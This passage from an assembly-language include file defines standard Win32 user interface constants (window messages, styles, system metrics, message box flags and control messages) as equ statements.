WM_DESTROYCLIPBOARD equ 307h
WM_DRAWCLIPBOARD equ 308h
WM_PAINTCLIPBOARD equ 309h
WM_VSCROLLCLIPBOARD equ 30Ah
WM_SIZECLIPBOARD equ 30Bh
WM_ASKCBFORMATNAME equ 30Ch
WM_CHANGECBCHAIN equ 30Dh
WM_HSCROLLCLIPBOARD equ 30Eh
WM_QUERYNEWPALETTE equ 30Fh
WM_PALETTEISCHANGING equ 310h
WM_PALETTECHANGED equ 311h
WM_HOTKEY equ 312h
WM_PRINTCLIENT equ 318h
WM_PENWINFIRST equ 380h
WM_PENWINLAST equ 38Fh
ST_BEGINSWP equ 0
ST_ENDSWP equ 1
HTERROR equ -2
HTTRANSPARENT equ -1
HTNOWHERE equ 0
HTCLIENT equ 1
HTCAPTION equ 2
HTSYSMENU equ 3
HTGROWBOX equ 4
HTSIZE equ HTGROWBOX
HTMENU equ 5
HTHSCROLL equ 6
HTVSCROLL equ 7
HTMINBUTTON equ 8
HTMAXBUTTON equ 9
HTLEFT equ 10
HTRIGHT equ 11
HTTOP equ 12
HTTOPLEFT equ 13
HTTOPRIGHT equ 14
HTBOTTOM equ 15
HTBOTTOMLEFT equ 16
HTBOTTOMRIGHT equ 17
HTBORDER equ 18
HTREDUCE equ HTMINBUTTON
HTZOOM equ HTMAXBUTTON
HTSIZEFIRST equ HTLEFT
HTSIZELAST equ HTBOTTOMRIGHT
SMTO_NORMAL equ 0h
SMTO_BLOCK equ 1h
SMTO_ABORTIFHUNG equ 2h
MA_ACTIVATE equ 1
MA_ACTIVATEANDEAT equ 2
MA_NOACTIVATE equ 3
MA_NOACTIVATEANDEAT equ 4
SIZE_RESTORED equ 0
SIZE_MINIMIZED equ 1
SIZE_MAXIMIZED equ 2
SIZE_MAXSHOW equ 3
SIZE_MAXHIDE equ 4
SIZENORMAL equ SIZE_RESTORED
SIZEICONIC equ SIZE_MINIMIZED
SIZEFULLSCREEN equ SIZE_MAXIMIZED
SIZEZOOMSHOW equ SIZE_MAXSHOW
SIZEZOOMHIDE equ SIZE_MAXHIDE
WVR_ALIGNTOP equ 10h
WVR_ALIGNLEFT equ 20h
WVR_ALIGNBOTTOM equ 40h
WVR_ALIGNRIGHT equ 80h
WVR_HREDRAW equ 100h
WVR_VREDRAW equ 200h
WVR_REDRAW equ WVR_HREDRAW|WVR_VREDRAW
WVR_VALIDRECTS equ 400h
MK_LBUTTON equ 1h
MK_RBUTTON equ 2h
MK_SHIFT equ 4h
MK_CONTROL equ 8h
MK_MBUTTON equ 10h
WS_OVERLAPPED equ 0h
WS_POPUP equ 80000000h
WS_CHILD equ 40000000h
WS_MINIMIZE equ 20000000h
WS_VISIBLE equ 10000000h
WS_DISABLED equ 8000000h
WS_CLIPSIBLINGS equ 4000000h
WS_CLIPCHILDREN equ 2000000h
WS_MAXIMIZE equ 1000000h
WS_CAPTION equ 0C00000h
WS_BORDER equ 800000h
WS_DLGFRAME equ 400000h
WS_VSCROLL equ 200000h
WS_HSCROLL equ 100000h
WS_SYSMENU equ 80000h
WS_THICKFRAME equ 40000h
WS_GROUP equ 20000h
WS_TABSTOP equ 10000h
WS_MINIMIZEBOX equ 20000h
WS_MAXIMIZEBOX equ 10000h
WS_TILED equ WS_OVERLAPPED
WS_ICONIC equ WS_MINIMIZE
WS_SIZEBOX equ WS_THICKFRAME
WS_OVERLAPPEDWINDOW equ WS_OVERLAPPED|WS_CAPTION|WS_SYSMENU|WS_THICKFRAME|WS_MINIMIZEBOX|
WS_MAXIMIZEBOX
WS_TILEDWINDOW equ WS_OVERLAPPEDWINDOW
WS_POPUPWINDOW equ WS_POPUP|WS_BORDER|WS_SYSMENU
WS_CHILDWINDOW equ WS_CHILD
WS_EX_DLGMODALFRAME equ 1h
WS_EX_NOPARENTNOTIFY equ 4h
WS_EX_TOPMOST equ 8h
WS_EX_ACCEPTFILES equ 10h
WS_EX_TRANSPARENT equ 20h
WS_EX_MDICHILD equ 00000040h
WS_EX_TOOLWINDOW equ 00000080h
WS_EX_WINDOWEDGE equ 00000100h
WS_EX_CLIENTEDGE equ 00000200h
WS_EX_CONTEXTHELP equ 00000400h
WS_EX_RIGHT equ 00001000h
WS_EX_LEFT equ 00000000h
WS_EX_RTLREADING equ 00002000h
WS_EX_LTRREADING equ 00000000h
WS_EX_LEFTSCROLLBAR equ 00004000h
WS_EX_RIGHTSCROLLBAR equ 00000000h
WS_EX_CONTROLPARENT equ 00010000h
WS_EX_STATICEDGE equ 00020000h
WS_EX_APPWINDOW equ 00040000h
WS_EX_OVERLAPPEDWINDOW equ WS_EX_WINDOWEDGE|WS_EX_CLIENTEDGE
WS_EX_PALETTEWINDOW equ WS_EX_WINDOWEDGE|WS_EX_TOOLWINDOW|WS_EX_TOPMOST
CS_VREDRAW equ 1h
CS_HREDRAW equ 2h
CS_KEYCVTWINDOW equ 4h
CS_DBLCLKS equ 8h
CS_OWNDC equ 20h
CS_CLASSDC equ 40h
CS_PARENTDC equ 80h
CS_NOKEYCVT equ 100h
CS_NOCLOSE equ 200h
CS_SAVEBITS equ 800h
CS_BYTEALIGNCLIENT equ 1000h
CS_BYTEALIGNWINDOW equ 2000h
CS_PUBLICCLASS equ 4000h
CS_GLOBALCLASS equ CS_PUBLICCLASS
CF_TEXT equ 1
CF_BITMAP equ 2
CF_METAFILEPICT equ 3
CF_SYLK equ 4
CF_DIF equ 5
CF_TIFF equ 6
CF_OEMTEXT equ 7
CF_DIB equ 8
CF_PALETTE equ 9
CF_PENDATA equ 10
CF_RIFF equ 11
CF_WAVE equ 12
CF_OWNERDISPLAY equ 80h
CF_DSPTEXT equ 81h
CF_DSPBITMAP equ 82h
CF_DSPMETAFILEPICT equ 83h
CF_DSPENHMETAFILE equ 8Eh
CF_PRIVATEFIRST equ 200h
CF_PRIVATELAST equ 2FFh
CF_GDIOBJFIRST equ 300h
CF_GDIOBJLAST equ 3FFh
FVIRTKEY equ 1h
FNOINVERT equ 2h
FSHIFT equ 4h
FCONTROL equ 8h
FALT equ 10h
WPF_SETMINPOSITION equ 1h
WPF_RESTORETOMAXIMIZED equ 2h
ODT_MENU equ 1
ODT_LISTBOX equ 2
ODT_COMBOBOX equ 3
ODT_BUTTON equ 4
ODA_DRAWENTIRE equ 1h
ODA_SELECT equ 2h
ODA_FOCUS equ 4h
ODS_SELECTED equ 1h
ODS_GRAYED equ 2h
ODS_DISABLED equ 4h
ODS_CHECKED equ 8h
ODS_FOCUS equ 10h
PM_NOREMOVE equ 0h
PM_REMOVE equ 1h
PM_NOYIELD equ 2h
MOD_ALT equ 1h
MOD_CONTROL equ 2h
MOD_SHIFT equ 4h
IDHOT_SNAPWINDOW equ -1
IDHOT_SNAPDESKTOP equ -2
EWX_LOGOFF equ 0
EWX_SHUTDOWN equ 1
EWX_REBOOT equ 2
EWX_FORCE equ 4
EW_RESTARTWINDOWS equ 42h
READAPI equ 0
WRITEAPI equ 1
READ_WRITE equ 2
HWND_BROADCAST equ 0FFFFh
CW_USEDEFAULT equ 80000000h
HWND_DESKTOP equ 0
SWP_NOSIZE equ 1h
SWP_NOMOVE equ 2h
SWP_NOZORDER equ 4h
SWP_NOREDRAW equ 8h
SWP_NOACTIVATE equ 10h
SWP_FRAMECHANGED equ 20h
SWP_SHOWWINDOW equ 40h
SWP_HIDEWINDOW equ 80h
SWP_NOCOPYBITS equ 100h
SWP_NOOWNERZORDER equ 200h
SWP_DRAWFRAME equ SWP_FRAMECHANGED
SWP_NOREPOSITION equ SWP_NOOWNERZORDER
HWND_TOP equ 0
HWND_BOTTOM equ 1
HWND_TOPMOST equ -1
HWND_NOTOPMOST equ -2
DLGWINDOWEXTRA equ 30
KEYEVENTF_EXTENDEDKEY equ 1h
KEYEVENTF_KEYUP equ 2h
MOUSEEVENTF_MOVE equ 1h
MOUSEEVENTF_LEFTDOWN equ 2h
MOUSEEVENTF_LEFTUP equ 4h
MOUSEEVENTF_RIGHTDOWN equ 8h
MOUSEEVENTF_RIGHTUP equ 10h
MOUSEEVENTF_MIDDLEDOWN equ 20h
MOUSEEVENTF_MIDDLEUP equ 40h
MOUSEEVENTF_ABSOLUTE equ 8000h
QS_KEY equ 1h
QS_MOUSEMOVE equ 2h
QS_MOUSEBUTTON equ 4h
QS_POSTMESSAGE equ 8h
QS_TIMER equ 10h
QS_PAINT equ 20h
QS_SENDMESSAGE equ 40h
QS_HOTKEY equ 80h
QS_MOUSE equ QS_MOUSEMOVE|QS_MOUSEBUTTON
QS_INPUT equ QS_MOUSE|QS_KEY
QS_ALLEVENTS equ QS_INPUT|QS_POSTMESSAGE|QS_TIMER|QS_PAINT|QS_HOTKEY
QS_ALLINPUT equ QS_SENDMESSAGE|QS_PAINT|QS_TIMER|QS_POSTMESSAGE|QS_MOUSEBUTTON|QS_MOUSEMOVE|
QS_HOTKEY|QS_KEY
SM_CXSCREEN equ 0
SM_CYSCREEN equ 1
SM_CXVSCROLL equ 2
SM_CYHSCROLL equ 3
SM_CYCAPTION equ 4
SM_CXBORDER equ 5
SM_CYBORDER equ 6
SM_CXDLGFRAME equ 7
SM_CYDLGFRAME equ 8
SM_CYVTHUMB equ 9
SM_CXHTHUMB equ 10
SM_CXICON equ 11
SM_CYICON equ 12
SM_CXCURSOR equ 13
SM_CYCURSOR equ 14
SM_CYMENU equ 15
SM_CXFULLSCREEN equ 16
SM_CYFULLSCREEN equ 17
SM_CYKANJIWINDOW equ 18
SM_MOUSEPRESENT equ 19
SM_CYVSCROLL equ 20
SM_CXHSCROLL equ 21
SM_DEBUG equ 22
SM_SWAPBUTTON equ 23
SM_RESERVED1 equ 24
SM_RESERVED2 equ 25
SM_RESERVED3 equ 26
SM_RESERVED4 equ 27
SM_CXMIN equ 28
SM_CYMIN equ 29
SM_CXSIZE equ 30
SM_CYSIZE equ 31
SM_CXFRAME equ 32
SM_CYFRAME equ 33
SM_CXMINTRACK equ 34
SM_CYMINTRACK equ 35
SM_CXDOUBLECLK equ 36
SM_CYDOUBLECLK equ 37
SM_CXICONSPACING equ 38
SM_CYICONSPACING equ 39
SM_MENUDROPALIGNMENT equ 40
SM_PENWINDOWS equ 41
SM_DBCSENABLED equ 42
SM_CMOUSEBUTTONS equ 43
SM_CXFIXEDFRAME equ SM_CXDLGFRAME
SM_CYFIXEDFRAME equ SM_CYDLGFRAME
SM_CXSIZEFRAME equ SM_CXFRAME
SM_CYSIZEFRAME equ SM_CYFRAME
SM_SECURE equ 44
SM_CXEDGE equ 45
SM_CYEDGE equ 46
SM_CXMINSPACING equ 47
SM_CYMINSPACING equ 48
SM_CXSMICON equ 49
SM_CYSMICON equ 50
SM_CYSMCAPTION equ 51
SM_CXSMSIZE equ 52
SM_CYSMSIZE equ 53
SM_CXMENUSIZE equ 54
SM_CYMENUSIZE equ 55
SM_ARRANGE equ 56
SM_CXMINIMIZED equ 57
SM_CYMINIMIZED equ 58
SM_CXMAXTRACK equ 59
SM_CYMAXTRACK equ 60
SM_CXMAXIMIZED equ 61
SM_CYMAXIMIZED equ 62
SM_NETWORK equ 63
SM_CLEANBOOT equ 67
SM_CXDRAG equ 68
SM_CYDRAG equ 69
SM_SHOWSOUNDS equ 70
SM_CXMENUCHECK equ 71
SM_CYMENUCHECK equ 72
SM_SLOWMACHINE equ 73
SM_MIDEASTENABLED equ 74
SM_CMETRICS equ 75
TPM_LEFTBUTTON equ 0h
TPM_RIGHTBUTTON equ 2h
TPM_LEFTALIGN equ 0h
TPM_CENTERALIGN equ 4h
TPM_RIGHTALIGN equ 8h
DT_TOP equ 0h
DT_LEFT equ 0h
DT_CENTER equ 1h
DT_RIGHT equ 2h
DT_VCENTER equ 4h
DT_BOTTOM equ 8h
DT_WORDBREAK equ 10h
DT_SINGLELINE equ 20h
DT_EXPANDTABS equ 40h
DT_TABSTOP equ 80h
DT_NOCLIP equ 100h
DT_EXTERNALLEADING equ 200h
DT_CALCRECT equ 400h
DT_NOPREFIX equ 800h
DT_INTERNAL equ 1000h
DCX_WINDOW equ 1h
DCX_CACHE equ 2h
DCX_NORESETATTRS equ 4h
DCX_CLIPCHILDREN equ 8h
DCX_CLIPSIBLINGS equ 10h
DCX_PARENTCLIP equ 20h
DCX_EXCLUDERGN equ 40h
DCX_INTERSECTRGN equ 80h
DCX_EXCLUDEUPDATE equ 100h
DCX_INTERSECTUPDATE equ 200h
DCX_LOCKWINDOWUPDATE equ 400h
DCX_NORECOMPUTE equ 100000h
DCX_VALIDATE equ 200000h
RDW_INVALIDATE equ 1h
RDW_INTERNALPAINT equ 2h
RDW_ERASE equ 4h
RDW_VALIDATE equ 8h
RDW_NOINTERNALPAINT equ 10h
RDW_NOERASE equ 20h
RDW_NOCHILDREN equ 40h
RDW_ALLCHILDREN equ 80h
RDW_UPDATENOW equ 100h
RDW_ERASENOW equ 200h
RDW_FRAME equ 400h
RDW_NOFRAME equ 800h
SW_SCROLLCHILDREN equ 1h
SW_INVALIDATE equ 2h
SW_ERASE equ 4h
ESB_ENABLE_BOTH equ 0h
ESB_DISABLE_BOTH equ 3h
ESB_DISABLE_LEFT equ 1h
ESB_DISABLE_RIGHT equ 2h
ESB_DISABLE_UP equ 1h
ESB_DISABLE_DOWN equ 2h
ESB_DISABLE_LTUP equ ESB_DISABLE_LEFT
ESB_DISABLE_RTDN equ ESB_DISABLE_RIGHT
MB_OK equ 0h
MB_OKCANCEL equ 1h
MB_ABORTRETRYIGNORE equ 2h
MB_YESNOCANCEL equ 3h
MB_YESNO equ 4h
MB_RETRYCANCEL equ 5h
MB_ICONHAND equ 10h
MB_ICONQUESTION equ 20h
MB_ICONEXCLAMATION equ 30h
MB_ICONASTERISK equ 40h
MB_ICONERROR equ MB_ICONHAND
MB_ICONINFORMATION equ MB_ICONASTERISK
MB_ICONSTOP equ MB_ICONHAND
MB_ICONWARNING equ MB_ICONEXCLAMATION
MB_DEFBUTTON1 equ 0h
MB_DEFBUTTON2 equ 100h
MB_DEFBUTTON3 equ 200h
MB_APPLMODAL equ 0h
MB_SYSTEMMODAL equ 1000h
MB_TASKMODAL equ 2000h
MB_NOFOCUS equ 8000h
MB_SETFOREGROUND equ 10000h
MB_DEFAULT_DESKTOP_ONLY equ 20000h
MB_TYPEMASK equ 0Fh
MB_ICONMASK equ 0F0h
MB_DEFMASK equ 0F00h
MB_MODEMASK equ 3000h
MB_MISCMASK equ 0C000h
CTLCOLOR_MSGBOX equ 0
CTLCOLOR_EDIT equ 1
CTLCOLOR_LISTBOX equ 2
CTLCOLOR_BTN equ 3
CTLCOLOR_DLG equ 4
CTLCOLOR_SCROLLBAR equ 5
CTLCOLOR_STATIC equ 6
CTLCOLOR_MAX equ 8
COLOR_SCROLLBAR equ 0
COLOR_BACKGROUND equ 1
COLOR_ACTIVECAPTION equ 2
COLOR_INACTIVECAPTION equ 3
COLOR_MENU equ 4
COLOR_WINDOW equ 5
COLOR_WINDOWFRAME equ 6
COLOR_MENUTEXT equ 7
COLOR_WINDOWTEXT equ 8
COLOR_CAPTIONTEXT equ 9
COLOR_ACTIVEBORDER equ 10
COLOR_INACTIVEBORDER equ 11
COLOR_APPWORKSPACE equ 12
COLOR_HIGHLIGHT equ 13
COLOR_HIGHLIGHTTEXT equ 14
COLOR_BTNFACE equ 15
COLOR_BTNSHADOW equ 16
COLOR_GRAYTEXT equ 17
COLOR_BTNTEXT equ 18
COLOR_INACTIVECAPTIONTEXT equ 19
COLOR_BTNHIGHLIGHT equ 20
COLOR_3DDKSHADOW equ 21
COLOR_3DLIGHT equ 22
COLOR_INFOTEXT equ 23
COLOR_INFOBK equ 24
COLOR_DESKTOP equ COLOR_BACKGROUND
COLOR_3DFACE equ COLOR_BTNFACE
COLOR_3DSHADOW equ COLOR_BTNSHADOW
COLOR_3DHIGHLIGHT equ COLOR_BTNHIGHLIGHT
COLOR_3DHILIGHT equ COLOR_BTNHIGHLIGHT
COLOR_BTNHILIGHT equ COLOR_BTNHIGHLIGHT
GW_HWNDFIRST equ 0
GW_HWNDLAST equ 1
GW_HWNDNEXT equ 2
GW_HWNDPREV equ 3
GW_OWNER equ 4
GW_CHILD equ 5
GW_MAX equ 5
MF_INSERT equ 0h
MF_CHANGE equ 80h
MF_APPEND equ 100h
MF_DELETE equ 200h
MF_REMOVE equ 1000h
MF_BYCOMMAND equ 0h
MF_BYPOSITION equ 400h
MF_SEPARATOR equ 800h
MF_ENABLED equ 0h
MF_GRAYED equ 1h
MF_DISABLED equ 2h
MF_UNCHECKED equ 0h
MF_CHECKED equ 8h
MF_USECHECKBITMAPS equ 200h
MF_STRING equ 0h
MF_BITMAP equ 4h
MF_OWNERDRAW equ 100h
MF_POPUP equ 10h
MF_MENUBARBREAK equ 20h
MF_MENUBREAK equ 40h
MF_UNHILITE equ 0h
MF_HILITE equ 80h
MF_SYSMENU equ 2000h
MF_HELP equ 4000h
MF_MOUSESELECT equ 8000h
MF_END equ 80h
SC_SIZE equ 0F000h
SC_MOVE equ 0F010h
SC_MINIMIZE equ 0F020h
SC_MAXIMIZE equ 0F030h
SC_NEXTWINDOW equ 0F040h
SC_PREVWINDOW equ 0F050h
SC_CLOSE equ 0F060h
SC_VSCROLL equ 0F070h
SC_HSCROLL equ 0F080h
SC_MOUSEMENU equ 0F090h
SC_KEYMENU equ 0F100h
SC_ARRANGE equ 0F110h
SC_RESTORE equ 0F120h
SC_TASKLIST equ 0F130h
SC_SCREENSAVE equ 0F140h
SC_HOTKEY equ 0F150h
SC_ICON equ SC_MINIMIZE
SC_ZOOM equ SC_MAXIMIZE
IDC_ARROW equ 32512
IDC_IBEAM equ 32513
IDC_WAIT equ 32514
IDC_CROSS equ 32515
IDC_UPARROW equ 32516
IDC_SIZE equ 32640
IDC_ICON equ 32641
IDC_SIZENWSE equ 32642
IDC_SIZENESW equ 32643
IDC_SIZEWE equ 32644
IDC_SIZENS equ 32645
IDC_SIZEALL equ 32646
IDC_NO equ 32648
IDC_APPSTARTING equ 32650
OBM_CLOSE equ 32754
OBM_UPARROW equ 32753
OBM_DNARROW equ 32752
OBM_RGARROW equ 32751
OBM_LFARROW equ 32750
OBM_REDUCE equ 32749
OBM_ZOOM equ 32748
OBM_RESTORE equ 32747
OBM_REDUCED equ 32746
OBM_ZOOMD equ 32745
OBM_RESTORED equ 32744
OBM_UPARROWD equ 32743
OBM_DNARROWD equ 32742
OBM_RGARROWD equ 32741
OBM_LFARROWD equ 32740
OBM_MNARROW equ 32739
OBM_COMBO equ 32738
OBM_UPARROWI equ 32737
OBM_DNARROWI equ 32736
OBM_RGARROWI equ 32735
OBM_LFARROWI equ 32734
OBM_OLD_CLOSE equ 32767
OBM_SIZE equ 32766
OBM_OLD_UPARROW equ 32765
OBM_OLD_DNARROW equ 32764
OBM_OLD_RGARROW equ 32763
OBM_OLD_LFARROW equ 32762
OBM_BTSIZE equ 32761
OBM_CHECK equ 32760
OBM_CHECKBOXES equ 32759
OBM_BTNCORNERS equ 32758
OBM_OLD_REDUCE equ 32757
OBM_OLD_ZOOM equ 32756
OBM_OLD_RESTORE equ 32755
OCR_NORMAL equ 32512
OCR_IBEAM equ 32513
OCR_WAIT equ 32514
OCR_CROSS equ 32515
OCR_UP equ 32516
OCR_SIZE equ 32640
OCR_ICON equ 32641
OCR_SIZENWSE equ 32642
OCR_SIZENESW equ 32643
OCR_SIZEWE equ 32644
OCR_SIZENS equ 32645
OCR_SIZEALL equ 32646
OCR_ICOCUR equ 32647
OCR_NO equ 32648
OIC_SAMPLE equ 32512
OIC_HAND equ 32513
OIC_QUES equ 32514
OIC_BANG equ 32515
OIC_NOTE equ 32516
ORD_LANGDRIVER equ 1
IDI_APPLICATION equ 32512
IDI_HAND equ 32513
IDI_QUESTION equ 32514
IDI_EXCLAMATION equ 32515
IDI_ASTERISK equ 32516
IDOK equ 1
IDCANCEL equ 2
IDABORT equ 3
IDRETRY equ 4
IDIGNORE equ 5
IDYES equ 6
IDNO equ 7
ES_LEFT equ 0h
ES_CENTER equ 1h
ES_RIGHT equ 2h
ES_MULTILINE equ 4h
ES_UPPERCASE equ 8h
ES_LOWERCASE equ 10h
ES_PASSWORD equ 20h
ES_AUTOVSCROLL equ 40h
ES_AUTOHSCROLL equ 80h
ES_NOHIDESEL equ 100h
ES_OEMCONVERT equ 400h
ES_READONLY equ 800h
ES_WANTRETURN equ 1000h
EN_SETFOCUS equ 100h
EN_KILLFOCUS equ 200h
EN_CHANGE equ 300h
EN_UPDATE equ 400h
EN_ERRSPACE equ 500h
EN_MAXTEXT equ 501h
EN_HSCROLL equ 601h
EN_VSCROLL equ 602h
EM_GETSEL equ 0B0h
EM_SETSEL equ 0B1h
EM_GETRECT equ 0B2h
EM_SETRECT equ 0B3h
EM_SETRECTNP equ 0B4h
EM_SCROLL equ 0B5h
EM_LINESCROLL equ 0B6h
EM_SCROLLCARET equ 0B7h
EM_GETMODIFY equ 0B8h
EM_SETMODIFY equ 0B9h
EM_GETLINECOUNT equ 0BAh
EM_LINEINDEX equ 0BBh
EM_SETHANDLE equ 0BCh
EM_GETHANDLE equ 0BDh
EM_GETTHUMB equ 0BEh
EM_LINELENGTH equ 0C1h
EM_REPLACESEL equ 0C2h
EM_GETLINE equ 0C4h
EM_LIMITTEXT equ 0C5h
EM_CANUNDO equ 0C6h
EM_UNDO equ 0C7h
EM_FMTLINES equ 0C8h
EM_LINEFROMCHAR equ 0C9h
EM_SETTABSTOPS equ 0CBh
EM_SETPASSWORDCHAR equ 0CCh
EM_EMPTYUNDOBUFFER equ 0CDh
EM_GETFIRSTVISIBLELINE equ 0CEh
EM_SETREADONLY equ 0CFh
EM_SETWORDBREAKPROC equ 0D0h
EM_GETWORDBREAKPROC equ 0D1h
EM_GETPASSWORDCHAR equ 0D2h
EM_SETMARGINS equ 0D3h
EM_GETMARGINS equ 0D4h
EM_SETLIMITTEXT equ EM_LIMITTEXT
EM_GETLIMITTEXT equ 0D5h
EM_POSFROMCHAR equ 0D6h
EM_CHARFROMPOS equ 0D7h
WB_LEFT equ 0
WB_RIGHT equ 1
WB_ISDELIMITER equ 2
BS_PUSHBUTTON equ 0h
BS_DEFPUSHBUTTON equ 1h
BS_CHECKBOX equ 2h
BS_AUTOCHECKBOX equ 3h
BS_RADIOBUTTON equ 4h
BS_3STATE equ 5h
BS_AUTO3STATE equ 6h
BS_GROUPBOX equ 7h
BS_USERBUTTON equ 8h
BS_AUTORADIOBUTTON equ 9h
BS_OWNERDRAW equ 0Bh
BS_LEFTTEXT equ 20h
BS_BITMAP equ 80h
BS_ICON equ 40h
BN_CLICKED equ 0
BN_PAINT equ 1
BN_HILITE equ 2
BN_UNHILITE equ 3
BN_DISABLE equ 4
BN_DOUBLECLICKED equ 5
BN_SETFOCUS equ 6
BN_KILLFOCUS equ 7
BST_UNCHECKED equ 00h
BST_CHECKED equ 01h
BST_INDETERMINATE equ 02h
BST_PUSHED equ 04h
BM_GETCHECK equ 0F0h
BM_SETCHECK equ 0F1h
BM_GETSTATE equ 0F2h
BM_SETSTATE equ 0F3h
BM_SETSTYLE equ 0F4h
BM_CLICK equ 0F5h
BM_GETIMAGE equ 0F6h
BM_SETIMAGE equ 0F7h
SS_LEFT equ 0h
SS_CENTER equ 1h
SS_RIGHT equ 2h
SS_ICON equ 3h
SS_BLACKRECT equ 4h
SS_GRAYRECT equ 5h
SS_WHITERECT equ 6h
SS_BLACKFRAME equ 7h
SS_GRAYFRAME equ 8h
SS_WHITEFRAME equ 9h
SS_USERITEM equ 0Ah
SS_SIMPLE equ 0Bh
SS_LEFTNOWORDWRAP equ 0Ch
SS_NOPREFIX equ 80h
STM_SETICON equ 170h
STM_GETICON equ 171h
STM_MSGMAX equ 172h
WC_DIALOG equ 8002
DWL_MSGRESULT equ 0
DWL_DLGPROC equ 4
DWL_USER equ 8
DDL_READWRITE equ 0h
DDL_READONLY equ 1h
DDL_HIDDEN equ 2h
DDL_SYSTEM equ 4h
DDL_DIRECTORY equ 10h
DDL_ARCHIVE equ 20h
DDL_POSTMSGS equ 2000h
DDL_DRIVES equ 4000h
DDL_EXCLUSIVE equ 8000h
DS_ABSALIGN equ 0001h
DS_SYSMODAL equ 0002h
DS_3DLOOK equ 0004h
DS_FIXEDSYS equ 0008h
DS_NOFAILCREATE equ 0010h
DS_LOCALEDIT equ 0020h
DS_SETFONT equ 0040h
DS_MODALFRAME equ 0080h
DS_NOIDLEMSG equ 0100h
DS_SETFOREGROUND equ 0200h
DS_CONTROL equ 0400h
DS_CENTER equ 0800h
DS_CENTERMOUSE equ 1000h
DS_CONTEXTHELP equ 2000h
DM_GETDEFID equ WM_USER+0
DM_SETDEFID equ WM_USER+1
DC_HASDEFID equ 534h
DLGC_WANTARROWS equ 1h
DLGC_WANTTAB equ 2h
DLGC_WANTALLKEYS equ 4h
DLGC_WANTMESSAGE equ 4h
DLGC_HASSETSEL equ 8h
DLGC_DEFPUSHBUTTON equ 10h
DLGC_UNDEFPUSHBUTTON equ 20h
DLGC_RADIOBUTTON equ 40h
DLGC_WANTCHARS equ 80h
DLGC_STATIC equ 100h
DLGC_BUTTON equ 2000h
LB_CTLCODE equ 0
LB_OKAY equ 0
LB_ERR equ -1
LB_ERRSPACE equ -2
LBN_ERRSPACE equ -2
LBN_SELCHANGE equ 1
LBN_DBLCLK equ 2
LBN_SELCANCEL equ 3
LBN_SETFOCUS equ 4
LBN_KILLFOCUS equ 5
LB_ADDSTRING equ 180h
LB_INSERTSTRING equ 181h
LB_DELETESTRING equ 182h
LB_SELITEMRANGEEX equ 183h
LB_RESETCONTENT equ 184h
LB_SETSEL equ 185h
LB_SETCURSEL equ 186h
LB_GETSEL equ 187h
LB_GETCURSEL equ 188h
LB_GETTEXT equ 189h
LB_GETTEXTLEN equ 18Ah
LB_GETCOUNT equ 18Bh
LB_SELECTSTRING equ 18Ch
LB_DIR equ 18Dh
LB_GETTOPINDEX equ 18Eh
LB_FINDSTRING equ 18Fh
LB_GETSELCOUNT equ 190h
LB_GETSELITEMS equ 191h
LB_SETTABSTOPS equ 192h
LB_GETHORIZONTALEXTENT equ 193h
LB_SETHORIZONTALEXTENT equ 194h
LB_SETCOLUMNWIDTH equ 195h
LB_ADDFILE equ 196h
LB_SETTOPINDEX equ 197h
LB_GETITEMRECT equ 198h
LB_GETITEMDATA equ 199h
LB_SETITEMDATA equ 19Ah
LB_SELITEMRANGE equ 19Bh
LB_SETANCHORINDEX equ 19Ch
LB_GETANCHORINDEX equ 19Dh
LB_SETCARETINDEX equ 19Eh
LB_GETCARETINDEX equ 19Fh
LB_SETITEMHEIGHT equ 1A0h
LB_GETITEMHEIGHT equ 1A1h
LB_FINDSTRINGEXACT equ 1A2h
LB_SETLOCALE equ 1A5h
LB_GETLOCALE equ 1A6h
LB_SETCOUNT equ 1A7h
LB_MSGMAX equ 1A8h
LBS_NOTIFY equ 1h
LBS_SORT equ 2h
LBS_NOREDRAW equ 4h
LBS_MULTIPLESEL equ 8h
LBS_OWNERDRAWFIXED equ 10h
LBS_OWNERDRAWVARIABLE equ 20h
LBS_HASSTRINGS equ 40h
LBS_USETABSTOPS equ 80h
LBS_NOINTEGRALHEIGHT equ 100h
LBS_MULTICOLUMN equ 200h
LBS_WANTKEYBOARDINPUT equ 400h
LBS_EXTENDEDSEL equ 800h
LBS_DISABLENOSCROLL equ 1000h
LBS_NODATA equ 2000h
LBS_STANDARD equ LBS_NOTIFY|LBS_SORT|WS_VSCROLL|WS_BORDER
CB_OKAY equ 0
CB_ERR equ -1
CB_ERRSPACE equ -2
CBN_ERRSPACE equ -1
CBN_SELCHANGE equ 1
CBN_DBLCLK equ 2
CBN_SETFOCUS equ 3
CBN_KILLFOCUS equ 4
CBN_EDITCHANGE equ 5
CBN_EDITUPDATE equ 6
CBN_DROPDOWN equ 7
CBN_CLOSEUP equ 8
CBN_SELENDOK equ 9
CBN_SELENDCANCEL equ 10
CBS_SIMPLE equ 1h
CBS_DROPDOWN equ 2h
CBS_DROPDOWNLIST equ 3h
CBS_OWNERDRAWFIXED equ 10h
CBS_OWNERDRAWVARIABLE equ 20h
CBS_AUTOHSCROLL equ 40h
CBS_OEMCONVERT equ 80h
CBS_SORT equ 100h
CBS_HASSTRINGS equ 200h
CBS_NOINTEGRALHEIGHT equ 400h
CBS_DISABLENOSCROLL equ 800h
CB_GETEDITSEL equ 140h
CB_LIMITTEXT equ 141h
CB_SETEDITSEL equ 142h
CB_ADDSTRING equ 143h
CB_DELETESTRING equ 144h
CB_DIR equ 145h
CB_GETCOUNT equ 146h
CB_GETCURSEL equ 147h
CB_GETLBTEXT equ 148h
CB_GETLBTEXTLEN equ 149h
CB_INSERTSTRING equ 14Ah
CB_RESETCONTENT equ 14Bh
CB_FINDSTRING equ 14Ch
CB_SELECTSTRING equ 14Dh
CB_SETCURSEL equ 14Eh
CB_SHOWDROPDOWN equ 14Fh
CB_GETITEMDATA equ 150h
CB_SETITEMDATA equ 151h
CB_GETDROPPEDCONTROLRECT equ 152h
CB_SETITEMHEIGHT equ 153h
CB_GETITEMHEIGHT equ 154h
CB_SETEXTENDEDUI equ 155h
CB_GETEXTENDEDUI equ 156h
CB_GETDROPPEDSTATE equ 157h
CB_FINDSTRINGEXACT equ 158h
CB_SETLOCALE equ 159h
CB_GETLOCALE equ 15Ah
CB_GETTOPINDEX equ 15Bh
CB_SETTOPINDEX equ 15Ch
CB_GETHORIZONTALEXTENT equ 15Dh
CB_SETHORIZONTALEXTENT equ 15Eh
CB_GETDROPPEDWIDTH equ 15Fh
CB_SETDROPPEDWIDTH equ 160h
CB_INITSTORAGE equ 161h
CB_MSGMAX equ 162h
SBS_HORZ equ 0h
SBS_VERT equ 1h
SBS_TOPALIGN equ 2h
SBS_LEFTALIGN equ 2h
SBS_BOTTOMALIGN equ 4h
